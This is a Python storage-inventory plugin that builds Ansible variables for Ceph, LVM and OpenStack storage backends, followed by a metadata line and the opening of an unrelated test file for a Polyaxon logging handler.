"glance_rbd_store_pool": "{{ glance_pool_name }}",
"glance_rbd_store_chunk_size": "8",
"ceph_conf": "/etc/ceph/ceph.conf"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_GLANCE_LVM_ALL_GROUP_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"glance_default_store": "file"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
# ceph-ansible variables must be set at host_vars -level
# ceph-ansible sample variables in group_vars
# group_vars - all.yml.sample
JSON_CEPH_ANSIBLE_ALL_HOST_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"mon_group_name": "mons",
"osd_group_name": "osds",
"mgr_group_name": "mgrs",
"ceph_stable_release": "luminous",
"generate_fsid": "true",
"cephx": "true",
"journal_size": "10240",
"osd_objectstore": "bluestore"
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
# pylint: disable=line-too-long
# ceph-ansible
# group_vars - mons.yml.sample
JSON_CEPH_ANSIBLE_MONS_HOST_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"monitor_secret": "{{ '{{ monitor_keyring.stdout }}' }}",
"openstack_config": true,
"cephkeys_access_group": "cephkeys",
"openstack_pools": [
{
"name": "{{ platform_pool }}",
"pg_num": "{{ osd_pool_shared_pg_num }}",
"rule_name": ""
}{% if is_openstack_deployment %},
{
"name": "{{ glance_pool }}",
"pg_num": "{{ osd_pool_images_pg_num }}",
"rule_name": ""
},
{
"name": "{{ cinder_pool }}",
"pg_num": "{{ osd_pool_volumes_pg_num }}",
"rule_name": ""
},
{
"name": "{{ nova_pool }}",
"pg_num": "{{ osd_pool_vms_pg_num }}",
"rule_name": ""
}
{%- endif %}
{%- if is_caas_deployment and 0 < osd_pool_caas_pg_num %},
{
"name": "caas",
"pg_num": "{{ osd_pool_caas_pg_num }}",
"rule_name": ""
}
{%- endif %}
],
"openstack_keys": [
{
"acls": [],
"key": "{{ ceph_keys['client.shared'] }}",
"mode": "0600",
"mon_cap": "allow r",
"name": "client.shared",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool={{ platform_pool }}"
}{% if is_openstack_deployment %},
{
"acls": [],
"key": "{{ ceph_keys['client.glance'] }}",
"mode": "0640",
"mon_cap": "allow r",
"name": "client.glance",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool={{ glance_pool }}"
},
{
"acls": [],
"key": "{{ ceph_keys['client.cinder'] }}",
"mode": "0640",
"mon_cap": "allow r, allow command \\\\\\\\\\\\\\"osd blacklist\\\\\\\\\\\\\\"",
"name": "client.cinder",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool={{ cinder_pool }}, allow rwx pool={{ nova_pool }}, allow rx pool={{ glance_pool }}"
}
{%- endif %}
{%- if is_caas_deployment and 0 < osd_pool_caas_pg_num %},
{
"acls": [],
"key": "{{ ceph_keys['client.caas'] }}",
"mode": "0600",
"mon_cap": "allow r",
"name": "client.caas",
"osd_cap": "allow class-read object_prefix rbd_children, allow rwx pool=caas"
}
{%- endif %}
]
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
# pylint: enable=line-too-long
# ceph-ansible
# group_vars - osds.yml.sample
JSON_CEPH_ANSIBLE_OSDS_HOST_VARS = """
{
{% for host in hosts %}
"{{ host.name }}": {
"raw_journal_devices": [],
"journal_collocation": true,
"raw_multi_journal": false,
"dmcrytpt_journal_collocation": false,
"dmcrypt_dedicated_journal": false,
"osd_scenario": "collocated",
"dedicated_devices": []
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
JSON_SINGLE_CONTROLLER_VAR = """
{
{% for host in hosts %}
"{{ host.name }}": {
"single_controller_host": true
} {% if not loop.last %},{% endif %}
{% endfor %}
}
"""
class Host(object):
def __init__(self):
self.name = None
self.is_lvm = None
self.is_osd = None
self.is_mon = None
self.is_mgr = None
self.is_rbd_ceph = None
self.ceph_osd_disks = []
self.lvm_disks = []
self.cinder_disks = []
self.is_controller = False
self.is_compute = False
self.is_storage = False
self.instance_physical_volumes = []
self.cinder_physical_volumes = []
self.instance_disks = []
self.instance_lv_percentage = ""
self.os_disk = ""
self.osd_disks_ids = []
self.vg_percentage = NOT_INSTANCE_NODE_VG_PERCENTAGE
self.mount_dir = ""
self.bare_lvm_disks = None
self.is_bare_lvm = None
self.bare_lvm_physical_volumes = None
self.mount_options = None
self.bare_lvm_lv_name = None
class storageinventory(cmansibleinventoryconfig.CMAnsibleInventoryConfigPlugin):
def __init__(self, confman, inventory, ownhost):
super(storageinventory, self).__init__(confman, inventory, ownhost)
self.hosts = []
self.storage_hosts = []
self.compute_hosts = []
self.controller_hosts = []
self._mon_hosts = []
self._osd_hosts = []
self._mgr_hosts = []
self.single_node_config = False
self._networking_config_handler = self.confman.get_networking_config_handler()
self._hosts_config_handler = self.confman.get_hosts_config_handler()
self._storage_config_handler = self.confman.get_storage_config_handler()
self._openstack_config_handler = self.confman.get_openstack_config_handler()
self._sp_config_handler = self.confman.get_storage_profiles_config_handler()
self._caas_config_handler = self.confman.get_caas_config_handler()
self._ceph_caas_pg_proportion = 0.0
self._ceph_openstack_pg_proportion = 0.0
self._ceph_keys_dict = None
self._cinder_pool_name = 'volumes'
self._glance_pool_name = 'images'
self._nova_pool_name = 'vms'
self._platform_pool_name = 'shared'
self._storage_profile_attribute_properties = {
'lvm_cinder_storage_partitions': {
'backends': ['lvm'],
'getter': self._sp_config_handler.get_profile_lvm_cinder_storage_partitions
},
'mount_options': {
'backends': ['bare_lvm'],
'getter': self._sp_config_handler.get_profile_bare_lvm_mount_options
},
'mount_dir': {
'backends': ['bare_lvm'],
'getter': self._sp_config_handler.get_profile_bare_lvm_mount_dir
},
'lv_name': {
'backends': ['bare_lvm'],
'getter': self._sp_config_handler.get_profile_bare_lvm_lv_name
},
'nr_of_ceph_osd_disks': {
'backends': ['ceph'],
'getter': self._sp_config_handler.get_profile_nr_of_ceph_osd_disks
},
'lvm_instance_storage_partitions': {
'backends': ['lvm', 'bare_lvm'],
'getter': self._sp_config_handler.get_profile_lvm_instance_storage_partitions
},
'lvm_instance_cow_lv_storage_percentage': {
'backends': ['lvm'],
'getter': self._sp_config_handler.get_profile_lvm_instance_cow_lv_storage_percentage
},
'openstack_pg_proportion': {
'backends': ['ceph'],
'getter': self._sp_config_handler.get_profile_ceph_openstack_pg_proportion
},
'caas_pg_proportion': {
'backends': ['ceph'],
'getter': self._sp_config_handler.get_profile_ceph_caas_pg_proportion
},
}
def _is_host_managment(self, host):
return self._is_profile_in_hosts_profiles(profiles.Profiles.get_management_service_profile(), host)
def _is_host_controller(self, host):
return self._is_profile_in_hosts_profiles(profiles.Profiles.get_controller_service_profile(), host)
def _is_profile_in_hosts_profiles(self, profile, host):
node_service_profiles = self._hosts_config_handler.get_service_profiles(host)
return profile in node_service_profiles
def _is_host_compute(self, host):
return self._is_profile_in_hosts_profiles(profiles.Profiles.get_compute_service_profile(), host)
def _is_host_caas_master(self, host):
return self._is_profile_in_hosts_profiles(profiles.Profiles.get_caasmaster_service_profile(), host)
def _is_host_storage(self, host):
return self._is_profile_in_hosts_profiles(profiles.Profiles.get_storage_service_profile(), host)
def _is_controller_has_compute(self):
if set.intersection(set(self.compute_hosts), set(self.controller_hosts)):
return True
return False
def _is_collocated_controller_node_config(self):
if set.intersection(set(self.storage_hosts), set(self.controller_hosts)):
return True
return False
def _is_collocated_3controllers_config(self):
if (self._is_collocated_controller_node_config() and
(len(self.controller_hosts) == 3) and (len(self.hosts) == 3)):
return True
return False
def _is_dedicated_storage_config(self):
collocated_config = set.intersection(set(self.storage_hosts), set(self.controller_hosts))
if collocated_config and (collocated_config == set(self.controller_hosts)):
return False
elif self.storage_hosts:
return True
else:
return False
def handle_bootstrapping(self):
self.handle('bootstrapping')
def handle_provisioning(self):
self.handle('provisioning')
def handle_postconfig(self):
self.handle('postconfig')
def handle_setup(self):
pass
def _template_and_add_vars_to_hosts(self, template, **variables):
try:
text = Environment().from_string(template).render(variables)
if text:
self._add_vars_for_hosts(text)
except Exception as exp:
raise cmerror.CMError(str(exp))
def _add_vars_for_hosts(self, inventory_text):
inventory = json.loads(inventory_text)
for host in inventory.keys():
for var, value in inventory[host].iteritems():
self.add_host_var(host, var, value)
@staticmethod
def _read_cinder_ceph_client_uuid():
if os.path.isfile(USER_SECRETS):
d = dict(line.split(':', 1) for line in open(USER_SECRETS))
cinder_ceph_client_uuid = d['cinder_ceph_client_uuid'].strip()
return cinder_ceph_client_uuid
else:
raise cmerror.CMError("The file {} does not exist.".format(USER_SECRETS))
def _add_cinder_backends(self):
self._template_and_add_vars_to_hosts(
JSON_CINDER_BACKENDS_HOST_VAR,
hosts=self.controller_hosts,
installation_controller_ip=self._installation_host_ip,
cinder_ceph_client_uuid=self._read_cinder_ceph_client_uuid(),
openstack_storage=self._openstack_config_handler.get_storage_backend(),
cinder_pool_name=self._cinder_pool_name)
def _add_external_ceph_cinder_backends(self):
handler = self._storage_config_handler
self._template_and_add_vars_to_hosts(
JSON_EXTERNAL_CEPH_CINDER_BACKEND_HOST_VAR,
hosts=self.hosts,
cinder_ceph_client_uuid=self._read_cinder_ceph_client_uuid(),
ext_ceph_user=handler.get_ext_ceph_ceph_user(),
ext_ceph_user_key=handler.get_ext_ceph_ceph_user_key(),
ext_ceph_fsid=handler.get_ext_ceph_fsid(),
ext_ceph_mon_hosts=", ".join(handler.get_ext_ceph_mon_hosts()),
nova_pool_name=self._nova_pool_name,
glance_pool_name=self._glance_pool_name,
cinder_pool_name=self._cinder_pool_name,
platform_pool_name=self._platform_pool_name)
def _add_storage_nodes_configs(self):
rbdhosts = []
for host in self.hosts:
if host.is_rbd_ceph:
rbdhosts.append(host)
self._template_and_add_vars_to_hosts(JSON_STORAGE_HOST_VAR, hosts=rbdhosts)
def _add_hdd_storage_configs(self):
self._template_and_add_vars_to_hosts(
JSON_STORAGE_HOST_DISK_CONFIGURATION,
hosts=self.hosts,
rootdisk_device=DEFAULT_ROOTDISK_DEVICE)
def _add_lvm_storage_configs(self):
self._template_and_add_vars_to_hosts(JSON_LVM_STORAGE_HOST_VAR, hosts=self.hosts)
def _add_bare_lvm_storage_configs(self):
self._template_and_add_vars_to_hosts(JSON_BARE_LVM_STORAGE_HOST_VAR, hosts=self.hosts)
def _add_instance_devices(self):
self._template_and_add_vars_to_hosts(JSON_DEVICE_HOST_VAR, hosts=self.compute_hosts)
def _add_ceph_hosts(self):
self._add_host_group(
Environment().from_string(JSON_CEPH_HOSTS).render(
mons=self._mon_hosts,
osds=self._osd_hosts,
mgrs=self._mgr_hosts))
self._add_global_parameters(
Environment().from_string(JSON_CEPH_HOSTS).render(
mons=self._mon_hosts,
osds=self._osd_hosts,
mgrs=self._mgr_hosts))
def _add_glance(self):
if self.is_ceph_backend:
self._template_and_add_vars_to_hosts(
JSON_GLANCE_CEPH_ALL_GROUP_VARS,
hosts=self.hosts,
glance_pool_name=self._glance_pool_name)
elif self.is_lvm_backend:
self._template_and_add_vars_to_hosts(JSON_GLANCE_LVM_ALL_GROUP_VARS, hosts=self.hosts)
def _add_ceph_ansible_all_sample_host_vars(self):
self._template_and_add_vars_to_hosts(JSON_CEPH_ANSIBLE_ALL_HOST_VARS, hosts=self.hosts)
def _add_ceph_ansible_mons_sample_host_vars(self):
self._template_and_add_vars_to_hosts(
JSON_CEPH_ANSIBLE_MONS_HOST_VARS,
hosts=self.hosts,
**self._get_ceph_vars())
@property
def _ceph_keys(self):
if not self._ceph_keys_dict:
try:
self._ceph_keys_dict = {
'client.shared': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip(),
'client.glance': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip(),
'client.cinder': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip(),
'client.caas': subprocess.check_output(["ceph-authtool", "--gen-print-key"]).strip()
}
except Exception as exp:
raise cmerror.CMError(str(exp))
return self._ceph_keys_dict
def _get_ceph_vars(self):
return {
'osd_pool_images_pg_num': self._calculated_images_pg_num,
'osd_pool_volumes_pg_num': self._calculated_volumes_pg_num,
'osd_pool_vms_pg_num': self._calculated_vms_pg_num,
'osd_pool_shared_pg_num': self._calculated_shared_pg_num,
'osd_pool_caas_pg_num': self._calculated_caas_pg_num,
'is_openstack_deployment': self._is_openstack_deployment,
'is_caas_deployment': self._is_caas_deployment,
'is_hybrid_deployment': self._is_hybrid_deployment,
'nova_pool': self._nova_pool_name,
'glance_pool': self._glance_pool_name,
'cinder_pool': self._cinder_pool_name,
'platform_pool': self._platform_pool_name,
'ceph_keys': self._ceph_keys
}
def _add_ceph_ansible_osds_sample_host_vars(self):
self._template_and_add_vars_to_hosts(JSON_CEPH_ANSIBLE_OSDS_HOST_VARS, hosts=self.hosts)
def _add_nova(self):
if self.is_external_ceph_backend:
nova_ceph_client = self._storage_config_handler.get_ext_ceph_ceph_user()
else:
nova_ceph_client = 'cinder'
self._template_and_add_vars_to_hosts(
JSON_NOVA_RBD_HOST_VAR, hosts=self.compute_hosts,
nova_pool_name=self._nova_pool_name,
nova_ceph_client=nova_ceph_client)
def _add_single_controller_host_var(self):
self._template_and_add_vars_to_hosts(
JSON_SINGLE_CONTROLLER_VAR, hosts=self.controller_hosts)
def _add_global_parameters(self, text):
try:
inventory = json.loads(text)
for var, value in inventory.iteritems():
self.add_global_var(var, value)
except Exception as exp:
raise cmerror.CMError(str(exp))
def _add_host_group(self, text):
try:
inventory = json.loads(text)
for var, value in inventory.iteritems():
self.add_host_group(var, value)
except Exception as exp:
raise cmerror.CMError(str(exp))
@property
def cluster_network_cidrs(self):
cidrs = []
network = self._networking_config_handler.get_infra_storage_cluster_network_name()
for domain in self._networking_config_handler.get_network_domains(network):
cidrs.append(self._networking_config_handler.get_network_cidr(network, domain))
return ','.join(cidrs)
@property
def public_network_cidrs(self):
cidrs = set()
cluster_network = self._networking_config_handler.get_infra_storage_cluster_network_name()
public_network = self._networking_config_handler.get_infra_internal_network_name()
for domain in self._networking_config_handler.get_network_domains(cluster_network):
cidrs.add(self._networking_config_handler.get_network_cidr(public_network, domain))
for host in self._mon_hosts:
domain = self._hosts_config_handler.get_host_network_domain(host.name)
cidrs.add(self._networking_config_handler.get_network_cidr(public_network, domain))
return ','.join(cidrs)
def _add_networks(self):
self._add_global_parameters(
Environment().from_string(JSON_NETWORK).render(
public_networks=self.public_network_cidrs,
cluster_networks=self.cluster_network_cidrs))
def _add_monitor_address(self):
infra_storage_network = self._networking_config_handler.get_infra_internal_network_name()
for host in self._mon_hosts:
monitor_address = \
self._networking_config_handler.get_host_ip(host.name, infra_storage_network)
self.add_host_var(host.name, "monitor_address", monitor_address)
def _add_override_settings(self):
ceph_osd_pool_size = self._storage_config_handler.get_ceph_osd_pool_size()
if self._is_collocated_3controllers_config():
self._add_global_parameters(
Environment().from_string(JSON_OVERRIDE_3CONTROLLERS).render(
osd_pool_default_size=ceph_osd_pool_size,
osd_pool_default_min_size=str(ceph_osd_pool_size-1),
osd_pool_default_pg_num=self._calculated_default_pg_num))
self._add_global_parameters(
Environment().from_string(JSON_OS_TUNING).render())
elif self._is_controller_has_compute():
self._add_global_parameters(
Environment().from_string(JSON_OVERRIDE_CACHE).render(
osd_pool_default_size=ceph_osd_pool_size,
osd_pool_default_min_size=str(ceph_osd_pool_size-1),
osd_pool_default_pg_num=self._calculated_default_pg_num))
self._add_global_parameters(
Environment().from_string(JSON_OS_TUNING).render())
else:
self._add_global_parameters(
Environment().from_string(JSON_OVERRIDE).render(
osd_pool_default_size=ceph_osd_pool_size,
osd_pool_default_min_size=str(ceph_osd_pool_size-1),
osd_pool_default_pg_num=self._calculated_default_pg_num))
def _calculate_pg_num(self, pool_data_percentage):
pgnum = PGNum(self._total_number_of_osds,
pool_data_percentage,
self._number_of_replicas)
return pgnum.calculate()
@property
def _calculated_default_pg_num(self):
return self._calculate_pg_num(self._pool_data_percentage)
@property
def _calculated_volumes_pg_num(self):
return self._calculate_pg_num(
OSD_POOL_VOLUMES_PG_NUM_PERCENTAGE * self._ceph_openstack_pg_proportion)
@property
def _calculated_images_pg_num(self):
return self._calculate_pg_num(
OSD_POOL_IMAGES_PG_NUM_PERCENTAGE * self._ceph_openstack_pg_proportion)
@property
def _calculated_vms_pg_num(self):
return self._calculate_pg_num(
OSD_POOL_VMS_PG_NUM_PERCENTAGE * self._ceph_openstack_pg_proportion)
@property
def _calculated_shared_pg_num(self):
return self._calculate_pg_num(
OSD_POOL_SHARED_PG_NUM_PERCENTAGE)
@property
def _calculated_caas_pg_num(self):
if self._ceph_caas_pg_proportion > 0:
return self._calculate_pg_num(
(OSD_POOL_CAAS_PG_NUM_PERCENTAGE - OSD_POOL_SHARED_PG_NUM_PERCENTAGE) *
self._ceph_caas_pg_proportion)
return 0
def _add_osd_pool_pg_nums(self):
self._add_global_parameters(
Environment().from_string(JSON_OSD_POOL_PGNUMS).render(**self._get_ceph_vars()))
@property
def _installation_host(self):
return self._hosts_config_handler.get_installation_host()
@property
def _infra_internal_network_name(self):
return self._networking_config_handler.get_infra_internal_network_name()
@property
def _installation_host_ip(self):
return self._networking_config_handler.get_host_ip(
self._installation_host, self._infra_internal_network_name)
@property
def is_ceph_backend(self):
return self._storage_config_handler.is_ceph_enabled()
@property
def is_external_ceph_backend(self):
return (self._storage_config_handler.is_external_ceph_enabled() and
self._ceph_is_openstack_storage_backend)
def _set_external_ceph_pool_names(self):
if self.is_external_ceph_backend:
h = self._storage_config_handler
self._nova_pool_name = h.get_ext_ceph_nova_pool()
self._cinder_pool_name = h.get_ext_ceph_cinder_pool()
self._glance_pool_name = h.get_ext_ceph_glance_pool()
self._platform_pool_name = h.get_ext_ceph_platform_pool()
@property
def _lvm_is_openstack_storage_backend(self):
return True if self._openstack_config_handler.get_storage_backend() == 'lvm' else False
@property
def _ceph_is_openstack_storage_backend(self):
return True if self._openstack_config_handler.get_storage_backend() == 'ceph' else False
@property
def is_lvm_backend(self):
return (self._storage_config_handler.is_lvm_enabled() and
self._lvm_is_openstack_storage_backend)
@property
def instance_default_backend(self):
return self._openstack_config_handler.get_instance_default_backend()
@property
def _hosts_with_ceph_storage_profile(self):
# return filter(lambda host: host.is_rbd, self.hosts)
return [host for host in self.hosts if host.is_rbd_ceph]
@property
def _is_openstack_deployment(self):
return self._caas_config_handler.is_openstack_deployment()
@property
def _is_caas_deployment(self):
return self._caas_config_handler.is_caas_deployment()
@property
def _is_hybrid_deployment(self):
return self._caas_config_handler.is_hybrid_deployment()
def handle(self, phase):
self._init_jinja_environment()
self.add_global_var("external_ceph_configured", self.is_external_ceph_backend)
self.add_global_var("ceph_configured", self.is_ceph_backend)
self.add_global_var("lvm_configured", self.is_lvm_backend)
if phase == 'bootstrapping':
self._add_hdd_storage_configs()
else:
self._add_hdd_storage_configs()
if self.is_external_ceph_backend:
self._set_external_ceph_pool_names()
self._add_external_ceph_cinder_backends()
else:
if self._is_openstack_deployment:
self._add_cinder_backends()
self._add_glance()
ceph_hosts = self._hosts_with_ceph_storage_profile
if ceph_hosts:
self._set_ceph_pg_proportions(ceph_hosts)
self._add_ceph_ansible_all_sample_host_vars()
self._add_ceph_ansible_mons_sample_host_vars()
self._add_ceph_ansible_osds_sample_host_vars()
self._add_ceph_hosts()
self._add_storage_nodes_configs()
self._add_monitor_address()
self._add_override_settings()
self._add_osd_pool_pg_nums()
self._add_networks()
self.add_global_var("cinder_ceph_client_uuid", self._read_cinder_ceph_client_uuid())
if self.is_lvm_backend:
self._add_lvm_storage_configs()
self._add_bare_lvm_storage_configs()
self.add_global_var("instance_default_backend", self.instance_default_backend)
self.add_global_var("storage_single_node_config", self.single_node_config)
self.add_global_var("one_controller_node_config", self._is_one_controller_node_config)
if self._is_one_controller_node_config:
self._add_single_controller_host_var()
self.add_global_var("collocated_controller_node_config",
self._is_collocated_controller_node_config())
self.add_global_var("dedicated_storage_node_config",
self._is_dedicated_storage_config())
self.add_global_var("storage_one_controller_multi_nodes_config",
self._is_one_controller_multi_nodes_config)
if self.instance_default_backend == 'rbd':
self._add_nova()
elif self.instance_default_backend in SUPPORTED_INSTANCE_BACKENDS:
self._add_instance_devices()
def _set_ceph_pg_proportions(self, ceph_hosts):
# FIXME: First storage host's storage profile assumed to get pg proportion values
hostname = ceph_hosts[0].name
if self._is_hybrid_deployment:
self._ceph_openstack_pg_proportion = self._get_ceph_openstack_pg_proportion(hostname)
self._ceph_caas_pg_proportion = self._get_ceph_caas_pg_proportion(hostname)
elif self._is_openstack_deployment:
self._ceph_openstack_pg_proportion = 1.0
self._ceph_caas_pg_proportion = 0.0
elif self._is_caas_deployment:
self._ceph_openstack_pg_proportion = 0.0
self._ceph_caas_pg_proportion = 1.0
def _init_host_data(self):
hosts = self._hosts_config_handler.get_enabled_hosts()
self.single_node_config = True if len(hosts) == 1 else False
for name in hosts:
host = self._initialize_host_object(name)
self.hosts.append(host)
if host.is_osd:
self._osd_hosts.append(host)
if host.is_mon:
self._mon_hosts.append(host)
if host.is_mgr:
self._mgr_hosts.append(host)
for host in self.hosts:
if host.is_compute:
self.compute_hosts.append(host)
if host.is_controller:
self.controller_hosts.append(host)
if host.is_storage:
self.storage_hosts.append(host)
@property
def _number_of_osd_hosts(self):
return len(self._osd_hosts)
@property
def _is_one_controller_multi_nodes_config(self):
if len(self.controller_hosts) == 1 and not self.single_node_config:
return True
return False
@property
def _is_one_controller_node_config(self):
if len(self.controller_hosts) == 1:
return True
return False
@property
def _number_of_osds_per_host(self):
first_osd_host = self._osd_hosts[0].name
return self._get_nr_of_ceph_osd_disks(first_osd_host)
@property
def _total_number_of_osds(self):
return self._number_of_osds_per_host * self._number_of_osd_hosts
@property
def _number_of_pools(self):
"""TODO: Get dynamically"""
return NUMBER_OF_POOLS
@property
def _pool_data_percentage(self):
return float(1.0 / self._number_of_pools)
@property
def _number_of_replicas(self):
num = self._storage_config_handler.get_ceph_osd_pool_size()
return 2 if num == 0 else num
def _init_jinja_environment(self):
self._init_host_data()
def _is_backend_configured(self, backend, host_name):
try:
if self._get_storage_profile_for_backend(host_name, backend):
return True
return False
except configerror.ConfigError:
return False
def _get_storage_profile_for_backend(self, host_name, *backends):
storage_profiles = self._hosts_config_handler.get_storage_profiles(host_name)
sp_handler = self._sp_config_handler
for storage_profile in storage_profiles:
if sp_handler.get_profile_backend(storage_profile) in backends:
return storage_profile
return None
def _get_nr_of_ceph_osd_disks(self, host_name):
return self._get_storage_profile_attribute(host_name, 'nr_of_ceph_osd_disks')
def _get_storage_profile_attribute(self, host_name, attribute):
attribute_properties = self._storage_profile_attribute_properties[attribute]
storage_profile = self._get_storage_profile_for_backend(host_name,
*attribute_properties['backends'])
if storage_profile:
return attribute_properties['getter'](storage_profile)
raise cmerror.CMError(str("Failed to get %s" % attribute))
def _get_ceph_openstack_pg_proportion(self, host_name):
return self._get_storage_profile_attribute(host_name, 'openstack_pg_proportion')
def _get_ceph_caas_pg_proportion(self, host_name):
return self._get_storage_profile_attribute(host_name, 'caas_pg_proportion')
def _get_lvm_instance_storage_partitions(self, host_name):
try:
if self.instance_default_backend in SUPPORTED_INSTANCE_BACKENDS:
return self._get_storage_profile_attribute(
host_name, 'lvm_instance_storage_partitions')
except configerror.ConfigError:
pass
if self.instance_default_backend not in ALL_DEFAULT_INSTANCE_BACKENDS:
raise cmerror.CMError(
str("Unknown instance_default_backend %s "
"not supported" % self.instance_default_backend))
return []
def _get_lvm_cinder_storage_partitions(self, host_name):
return self._get_storage_profile_attribute(host_name, 'lvm_cinder_storage_partitions')
def _get_bare_lvm_mount_options(self, host_name):
return self._get_storage_profile_attribute(host_name, 'mount_options')
def _get_bare_lvm_mount_dir(self, host_name):
return self._get_storage_profile_attribute(host_name, 'mount_dir')
def _get_bare_lvm_lv_name(self, host_name):
return self._get_storage_profile_attribute(host_name, 'lv_name')
def _get_instance_lv_percentage(self, host_name):
try:
if self.instance_default_backend in SUPPORTED_INSTANCE_BACKENDS:
return self._get_storage_profile_attribute(
host_name, 'lvm_instance_cow_lv_storage_percentage')
except configerror.ConfigError:
return DEFAULT_INSTANCE_LV_PERCENTAGE
raise cmerror.CMError(str("Failed to found lvm from storage_profiles"))
def _is_osd_host(self, name):
try:
return bool(name in self._hosts_config_handler.get_service_profile_hosts('storage'))
except configerror.ConfigError:
return False
def _is_rbd_ceph_configured(self, host_name):
return self._is_backend_configured('ceph', host_name)
def _is_lvm_configured(self, host_name):
return self._is_backend_configured('lvm', host_name)
def _is_bare_lvm_configured(self, host_name):
return self._is_backend_configured('bare_lvm', host_name)
def _get_hw_type(self, name):
hwmgmt_addr = self._hosts_config_handler.get_hwmgmt_ip(name)
hwmgmt_user = self._hosts_config_handler.get_hwmgmt_user(name)
hwmgmt_pass = self._hosts_config_handler.get_hwmgmt_password(name)
hwmgmt_priv_level = self._hosts_config_handler.get_hwmgmt_priv_level(name)
return hw.get_hw_type(hwmgmt_addr, hwmgmt_user, hwmgmt_pass, hwmgmt_priv_level)
@staticmethod
def _get_os_disk(hw_type):
return hw.get_os_hd(hw_type)
def _get_osd_disks_for_embedded_deployment(self, host_name):
return self._hosts_config_handler.get_ceph_osd_disks(host_name)
@staticmethod
def _get_osd_disks(hw_type):
return hw.get_hd_with_usage(hw_type, "osd")
def _by_path_disks(self, hw_type, nr_of_disks):
return self._get_osd_disks(hw_type)[0:nr_of_disks]
@staticmethod
def _is_by_path_disks(disk_list):
return [disk for disk in disk_list if "by-path" in disk]
def _get_physical_volumes(self, disk_list):
partition_nr = "1"
if self._is_by_path_disks(disk_list):
return [disk+"-part"+partition_nr for disk in disk_list]
else:
return [disk+partition_nr for disk in disk_list]
def _initialize_host_object(self, name):
host = Host()
host.name = name
host.is_mgr = self._is_host_managment(host.name)
host.is_controller = self._is_host_controller(host.name)
host.is_compute = self._is_host_compute(host.name)
host.is_storage = self._is_host_storage(host.name)
host.is_rbd_ceph = self._is_rbd_ceph_configured(host.name)
host.is_lvm = self._is_lvm_configured(host.name)
host.is_bare_lvm = self._is_bare_lvm_configured(host.name)
host.is_osd = self._is_osd_host(host.name)
host.is_mon = host.is_mgr
hw_type = self._get_hw_type(name)
host.os_disk = self._get_os_disk(hw_type)
if host.is_bare_lvm:
partitions = self._get_lvm_instance_storage_partitions(host.name)
host.bare_lvm_disks = self._by_path_disks(hw_type, len(partitions))
host.bare_lvm_physical_volumes = self._get_physical_volumes(host.bare_lvm_disks)
host.mount_options = self._get_bare_lvm_mount_options(host.name)
host.mount_dir = self._get_bare_lvm_mount_dir(host.name)
host.bare_lvm_lv_name = self._get_bare_lvm_lv_name(host.name)
if host.is_compute and self.instance_default_backend != 'rbd':
host.vg_percentage = INSTANCE_NODE_VG_PERCENTAGE
if self.is_lvm_backend and host.is_controller:
nr_of_cinder_disks = int(len(self._get_lvm_cinder_storage_partitions(host.name)))
nr_of_nova_disks = int(len(self._get_lvm_instance_storage_partitions(host.name)))
nr_of_all_disks = nr_of_cinder_disks + nr_of_nova_disks
if nr_of_nova_disks > 0:
host.cinder_disks = \
self._by_path_disks(hw_type, nr_of_all_disks)[-nr_of_cinder_disks:]
else:
host.cinder_disks = self._by_path_disks(hw_type, nr_of_cinder_disks)
host.cinder_physical_volumes = self._get_physical_volumes(host.cinder_disks)
if host.is_rbd_ceph:
nr_of_osd_disks = self._get_nr_of_ceph_osd_disks(host.name)
if self._caas_config_handler.is_vnf_embedded_deployment():
host.ceph_osd_disks = \
self._get_osd_disks_for_embedded_deployment(host.name)[0:nr_of_osd_disks]
else:
host.ceph_osd_disks = self._get_osd_disks(hw_type)[0:nr_of_osd_disks]
host.osd_disks_ids = range(1, nr_of_osd_disks+1)
if host.is_lvm and host.is_compute:
partitions = self._get_lvm_instance_storage_partitions(host.name)
host.instance_disks = self._by_path_disks(hw_type, len(partitions))
host.instance_physical_volumes = self._get_physical_volumes(host.instance_disks)
host.instance_lv_percentage = self._get_instance_lv_percentage(host.name)
return host
| 38.954898 | 172 | 0.628109 |
f167192c1882033f95b84c2be7c34e0c680b7456 | 10,054 | py | Python | tests/ignite/contrib/handlers/test_polyaxon_logger.py | VinhLoiIT/ignite | 3b2b9655ea9f80ce49b8a9f1c2d72f80e2a95f56 | [
"BSD-3-Clause"
] | 1 | 2020-06-13T15:22:08.000Z | 2020-06-13T15:22:08.000Z | tests/ignite/contrib/handlers/test_polyaxon_logger.py | hefv57/ignite | a22a0f5e909ac70d2a1f76a60b6e84b2134f196c | [
"BSD-3-Clause"
] | null | null | null | tests/ignite/contrib/handlers/test_polyaxon_logger.py | hefv57/ignite | a22a0f5e909ac70d2a1f76a60b6e84b2134f196c | [
"BSD-3-Clause"
] | 1 | 2020-06-13T15:30:46.000Z | 2020-06-13T15:30:46.000Z | import os
import pytest
from unittest.mock import MagicMock, call
import torch
from ignite.engine import Engine, Events, State
from ignite.contrib.handlers.polyaxon_logger import *
os.environ["POLYAXON_NO_OP"] = "1"
def test_output_handler_with_wrong_logger_type():
wrapper = OutputHandler("tag", output_transform=lambda x: x)
mock_logger = MagicMock()
mock_engine = MagicMock()
with pytest.raises(RuntimeError, match="Handler 'OutputHandler' works only with PolyaxonLogger"):
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
def test_output_handler_output_transform():
wrapper = OutputHandler("tag", output_transform=lambda x: x)
mock_logger = MagicMock(spec=PolyaxonLogger)
mock_logger.log_metrics = MagicMock()
mock_engine = MagicMock()
mock_engine.state = State()
mock_engine.state.output = 12345
mock_engine.state.iteration = 123
wrapper(mock_engine, mock_logger, Events.ITERATION_STARTED)
mock_logger.log_metrics.assert_called_once_with(step=123, **{"tag/output": 12345})
wrapper = OutputHandler("another_tag", output_transform=lambda x: {"loss": x})
mock_logger = MagicMock(spec=PolyaxonLogger)
